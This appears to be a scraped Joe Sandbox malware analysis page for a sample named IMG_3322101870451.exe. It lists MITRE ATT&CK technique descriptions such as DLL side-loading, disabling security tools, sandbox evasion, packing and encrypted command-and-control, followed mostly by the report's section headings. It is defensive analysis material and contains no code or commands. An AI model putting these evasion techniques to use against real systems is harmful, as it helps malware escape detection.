Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMG_3322101870451.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: IMG_3322101870451.exePID: 8080, Parent PID: 3968

Windows Analysis Report
IMG_3322101870451.exe